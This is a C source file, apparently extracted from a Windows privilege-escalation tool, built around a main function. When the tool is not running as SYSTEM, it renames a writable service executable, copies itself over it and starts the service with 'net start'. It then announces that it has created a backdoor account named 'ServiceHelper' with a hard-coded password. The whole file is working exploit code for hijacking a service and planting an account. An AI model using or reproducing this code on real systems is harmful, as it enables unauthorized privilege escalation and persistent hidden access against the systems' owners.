
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_3__ TYPE_1__ ;


typedef int acUserName ;
struct TYPE_3__ {int * lpServiceProc; int * lpServiceName; } ;
typedef TYPE_1__ SERVICE_TABLE_ENTRY ;
typedef int * LPSERVICE_MAIN_FUNCTION ;
typedef int DWORD ;


 int CopyFile (char*,char*,int) ;
 int GetUserName (char*,int*) ;
 char* PWN_EXE ;
 int * PWN_ID ;
 char* PWN_NAME ;
 scalar_t__ ServiceMain ;
 int StartServiceCtrlDispatcher (TYPE_1__*) ;
 int exit (int) ;
 int fprintf (int ,char*) ;
 scalar_t__ malloc (int) ;
 int memset (char*,int ,int) ;
 int printf (char*) ;
 scalar_t__ rename (char*,char*) ;
 int snprintf (char*,int,char*,char*) ;
 int stderr ;
 scalar_t__ strcmp (char*,char*) ;
 int system (char*) ;

int main(int argc, char **argv) {
    char acUserName[100];
    DWORD nUserName = sizeof(acUserName);
    GetUserName(acUserName, &nUserName);

    if (strcmp((char *)&acUserName, "SYSTEM")) {
        char *str = (char *)malloc(2048);
        memset(str, 0, 2048);
        snprintf(str, 2048, "%s.bak", PWN_EXE);
        if (rename(PWN_EXE, str) != 0) {
           fprintf(stderr, " :(  sorry, can't write to file.\n");
           exit(1);
        }
        CopyFile(argv[0], PWN_EXE, !0);
        snprintf(str, 2048, "net start \"%s\" 2> NUL > NUL",PWN_NAME);
        printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
        system(str);
    }

    SERVICE_TABLE_ENTRY ServiceTable[2];

    ServiceTable[0].lpServiceName = PWN_ID;
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

    ServiceTable[1].lpServiceName = ((void*)0);
    ServiceTable[1].lpServiceProc = ((void*)0);
    StartServiceCtrlDispatcher(ServiceTable);

    return 0;
}
